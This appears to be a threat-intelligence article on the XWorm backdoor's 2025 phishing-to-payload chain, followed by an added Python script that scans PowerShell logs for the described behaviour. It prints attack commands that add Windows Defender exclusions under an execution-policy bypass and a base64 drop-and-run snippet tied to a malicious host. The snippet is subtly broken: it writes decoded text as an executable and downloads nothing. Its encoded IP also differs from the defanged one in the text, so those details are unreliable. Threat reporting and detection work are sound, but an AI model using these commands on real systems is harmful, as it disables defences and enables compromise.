Emerging quietly in mid-2025, the XWorm backdoor has evolved into a deceptively sophisticated threat that preys on both user confidence and system conventions.
Initial reports surfaced when organizations noted a sudden uptick in obscure .lnk-based phishing emails masquerading as benign documents.
Security teams quickly observed that these shortcuts triggered hidden PowerShell routines rather than opening any expected files, suggesting the emergence of a new infection chain.
Within days, enterprises across multiple sectors reported anomalous network connections to unfamiliar IP addresses, hinting at an active Command and Control (C2) infrastructure.
As the campaign gained momentum, Trellix analysts identified a notable departure from XWorm’s earlier, more predictable methods.
Gone were the simplistic batch scripts and obvious VBScript payloads; instead, the attackers now deploy a multi-stage mechanism that leverages both social engineering and technical subterfuge.
The initial .lnk file, often delivered via targeted spear-phishing, drops a benign-looking text artifact before silently fetching “discord.exe” from a remote host.
Upon execution, this .NET-based executable unpacks and launches two additional components—main.exe and system32.exe—with the latter serving as the core XWorm payload.
Once system32.exe takes hold, it performs rigorous environment checks, aborting if it detects a sandbox or virtual machine.
If the host is deemed genuine, the malware duplicates itself as Xclient.exe and establishes persistence by creating both a scheduled task and a registry Run key.
System defenses are methodically dismantled: the Windows Firewall is disabled through the policy registry value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DisableFirewall, while PowerShell is launched with -ExecutionPolicy Bypass to add Windows Defender exclusions for the dropped file and the malicious process.
powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\Temp\discord.exe"
powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess "Xclient.exe"
These commands ensure XWorm operates under minimal scrutiny, allowing unfettered access to the compromised environment.
Infection Mechanism and Deployment
The heart of XWorm’s new chain lies in its ingenious use of base64 encoding combined with Rijndael decryption, allowing the payload to remain concealed until execution.
The initial .lnk file embeds a base64 string that decodes into a one-line PowerShell command.
This command retrieves “discord.exe” from hxxp://85[.]203[.]4[.]232:5000/Discord.exe, saving it to the Temp directory before launching it stealthily.
$payload = "ZG93bmxvYWQgZnJvbSAgaHR0cDovLzg1LjIwMy4zLjIzMjo1MDAwL0Rpc2NvcmQuZXhl"
[IO.File]::WriteAllBytes("$env:TEMP\discord.exe", [Convert]::FromBase64String($payload))
Start-Process "$env:TEMP\discord.exe" -WindowStyle Hidden
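As an added example that is not part of the original report or article, the following Python script applies the detection logic a SOC would run over PowerShell Script Block Logging (Event ID 4104) entries to the two behaviours described above: the Defender exclusion and execution-policy tampering, and the base64 drop-and-run one-liner, whose embedded blob it decodes to surface the hidden URL (reported defanged). The sample log entries, rule names and regular expressions are my own constructions.

```python
# Added example (not the article's or Trellix's code): triage PowerShell Script
# Block Logging (Event ID 4104) text for the behaviours the report describes.
import base64
import binascii
import re
# Constructed sample entries resembling the commands above; not real telemetry.
SAMPLE_LOG = [
    'powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\\Temp\\discord.exe"',
    'powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess "Xclient.exe"',
    '$payload = "ZG93bmxvYWQgZnJvbSAgaHR0cDovLzg1LjIwMy4zLjIzMjo1MDAwL0Rpc2NvcmQuZXhl"',
    '[IO.File]::WriteAllBytes("$env:TEMP\\discord.exe", [Convert]::FromBase64String($payload))',
    'Start-Process "$env:TEMP\\discord.exe" -WindowStyle Hidden',
    'Get-ChildItem C:\\Users\\alice\\Documents',  # benign activity, must not alert
]
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_RE = re.compile(r"https?://[^\s\"']+")
RULES = [  # (tag, pattern); the tag names are my own labels for each behaviour
    ("defender-exclusion", re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I)),
    ("execpolicy-bypass", re.compile(r"-?ExecutionPolicy\s+Bypass", re.I)),
    ("b64-drop-and-run", re.compile(r"FromBase64String|WriteAllBytes|-WindowStyle\s+Hidden", re.I)),
]

def decode_embedded_base64(line):
    """Return the decoded text of every valid base64 blob found in one log line."""
    found = []
    for blob in B64_RE.findall(line):
        try:
            raw = base64.b64decode(blob, validate=True)
        except binascii.Error:
            continue  # long alphanumeric run that is not base64 (e.g. a hash)
        # -EncodedCommand payloads are UTF-16LE (NUL-padded ASCII); everything else UTF-8.
        enc = "utf-16-le" if len(raw) % 2 == 0 and raw[1:2] == b"\x00" else "utf-8"
        found.append(raw.decode(enc, errors="ignore"))
    return found

def defang(url):  # make a recovered URL unclickable in a ticket (scheme and host only)
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}{slash}{path}"

def scan(lines):
    """Return [(line_no, tags, defanged_urls)] for each line that trips a rule."""
    hits = []
    for no, line in enumerate(lines, 1):
        tags = [tag for tag, rx in RULES if rx.search(line)]
        urls = [defang(u) for t in decode_embedded_base64(line) for u in URL_RE.findall(t)]
        if urls:
            tags.append("b64-hidden-url")  # a URL hidden inside base64 is itself suspicious
        if tags:
            hits.append((no, tags, urls))
    return hits
```

Running scan(SAMPLE_LOG) flags the first five entries and leaves the benign Get-ChildItem line alone; the recovered URL is the one the article's payload string encodes.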
After activation, discord.exe drops main.exe and system32.exe, each packed with advanced obfuscation techniques to thwart static analysis.
Main.exe’s resource section harbors embedded Python modules, while system32.exe registers TLS (thread local storage) callbacks, which run before the program’s entry point, to execute critical code before any security hooks can intervene.
This layered approach not only complicates detection but ensures that each component reinforces the next, yielding a resilient, stealth-focused infection chain that challenges conventional defense strategies.
Through this evolution, XWorm demonstrates how blending social engineering, multi-stage payload delivery, and sophisticated cryptographic concealment can enable adversaries to outpace existing detection technologies, maintaining both stealth and persistence within targeted networks.